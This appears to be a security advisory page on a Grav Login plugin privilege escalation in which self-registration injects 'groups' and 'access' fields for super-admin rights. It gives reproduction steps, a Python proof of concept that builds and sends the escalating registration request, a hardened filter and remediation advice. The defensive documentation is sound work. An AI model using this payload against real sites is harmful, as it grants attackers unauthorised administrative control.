Grav Login Plugin Privilege Escalation Vulnerability

Vulnerability

A privilege escalation vulnerability affects the Grav Login plugin in versions prior to 2.0.0-beta.2. The Login::register() method copies the user-supplied 'groups' and 'access' fields from the registration POST data into the new user account without any server-side validation of their values. When user registration is enabled and those two fields appear in the plugin's allowed-fields list, an unauthenticated attacker can self-register with admin.super privileges simply by including the fields in the registration request. The root cause is the missing validation in the plugin itself: the only thing standing between an attacker and a super-admin account is the configuration allowlist, and a configuration setting is not a reliable security boundary.

Impact

An unauthenticated user who exploits this vulnerability registers directly as a super admin and gains full access to the Grav admin panel. According to Grav's advisory, that access can in turn be leveraged to execute remote code or to upload malicious plugins.

Reproduction

To reproduce this vulnerability, enable the registration feature of the Grav Login plugin and add 'groups' and 'access' to the registration's allowed-fields list. Then submit a registration request that POSTs values for 'username', 'password', 'email' and 'fullname' together with injected values for 'groups' and 'access' granting the admin.super right. The account created by that request is a super admin.
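The request described above, together with the server-side check that actually closes the hole, as an added example. This is not code from the Grav project or from the advisory: the form field names follow Grav's data[...] naming convention (assumed here), the usernames and privilege values are constructed, and the registration URL is a placeholder. The example also goes one step beyond the reproduction text by contrasting an allowlist-only filter with one that refuses the privileged fields unconditionally, which is the property a fix needs.

```python
"""Added example: build the self-registration request that injects
groups/access, and show why an allowlist alone is not a defence."""
import urllib.parse
import urllib.request

# Fields that must never be taken from a registration request, even if an
# administrator has listed them under the plugin's allowed fields.
PRIVILEGED_FIELDS = ("groups", "access")

# Constructed attacker-controlled values (assumed field layout): the
# injected access block grants admin.super, i.e. full admin panel access.
INJECTED_PRIVILEGES = {
    "data[groups][]": "admins",
    "data[access][admin][super]": "true",
    "data[access][site][login]": "true",
}


def build_registration_payload(username, password, email, fullname, escalate=True):
    """Return the POST body of a registration request; with escalate=True the
    privileged fields from the reproduction steps are injected as well."""
    payload = {
        "data[username]": username,
        "data[password]": password,
        "data[email]": email,
        "data[fullname]": fullname,
    }
    if escalate:
        payload.update(INJECTED_PRIVILEGES)
    return payload


def encode_form(payload):
    """URL-encode the payload as application/x-www-form-urlencoded bytes."""
    return urllib.parse.urlencode(payload).encode()


def send_registration(register_url, payload, timeout=10):
    """POST the payload to the (placeholder) registration endpoint and
    return the HTTP status. Only call this against a site you own."""
    req = urllib.request.Request(register_url, data=encode_form(payload), method="POST")
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.status


def parse_form_fields(payload):
    """Turn flat data[a][b][c]=v keys into a nested dict, which is the shape
    the form handler hands to the registration code (assumed here)."""
    fields = {}
    for key, value in payload.items():
        if not key.startswith("data["):
            continue
        is_list = key.endswith("[]")
        path = key[len("data"):].strip("[]").split("][")
        node = fields
        for part in path[:-1]:
            node = node.setdefault(part, {})
        if is_list:
            node.setdefault(path[-1], []).append(value)
        else:
            node[path[-1]] = value
    return fields


def vulnerable_filter(fields, allowed):
    """Allowlist-only filtering: privileged fields pass through whenever an
    administrator has added them to the allowed list."""
    return {k: v for k, v in fields.items() if k in allowed}


def hardened_filter(fields, allowed):
    """Refuse groups/access from user input regardless of configuration;
    privileges must be assigned by an admin, never by the registrant."""
    return {k: v for k, v in fields.items() if k in allowed and k not in PRIVILEGED_FIELDS}


def grants_super_admin(fields):
    """True if the stored fields would give the new account admin.super."""
    value = fields.get("access", {}).get("admin", {}).get("super", "")
    return str(value).lower() in ("1", "true", "yes", "on")


if __name__ == "__main__":
    allowed = ["username", "password", "email", "fullname", "groups", "access"]
    fields = parse_form_fields(
        build_registration_payload("eve", "Secret123!", "eve@example.com", "Eve")
    )
    print("allowlist only  ->", grants_super_admin(vulnerable_filter(fields, allowed)))
    print("hardened filter ->", grants_super_admin(hardened_filter(fields, allowed)))
```

Running the script prints True for the allowlist-only filter and False for the hardened one with the same misconfigured allowed-fields list, which is the whole point of the advisory: the fix has to live in the plugin's validation, not in the site's configuration.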

Remediation

Update the Grav Login plugin to version 2.0.0-beta.2 or later, where the registration code validates these fields server-side. As an interim measure on sites that cannot update immediately, disable user registration or remove 'groups' and 'access' from the registration's allowed-fields list, bearing in mind that this configuration change only narrows the exposure and does not replace the fix. Instructions for updating the plugin can be found in the Grav documentation.

Added: May 11, 2026, 4:36 PM
Updated: May 11, 2026, 4:36 PM

Vulnerability Rating

Custom Algorithm

spread: 5.2
impact: 5.0
exploitability: 9.7
remediation: 7.7
relevance: 8.0
threat: 6.4
urgency: 2.9
incentive: 8.3

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.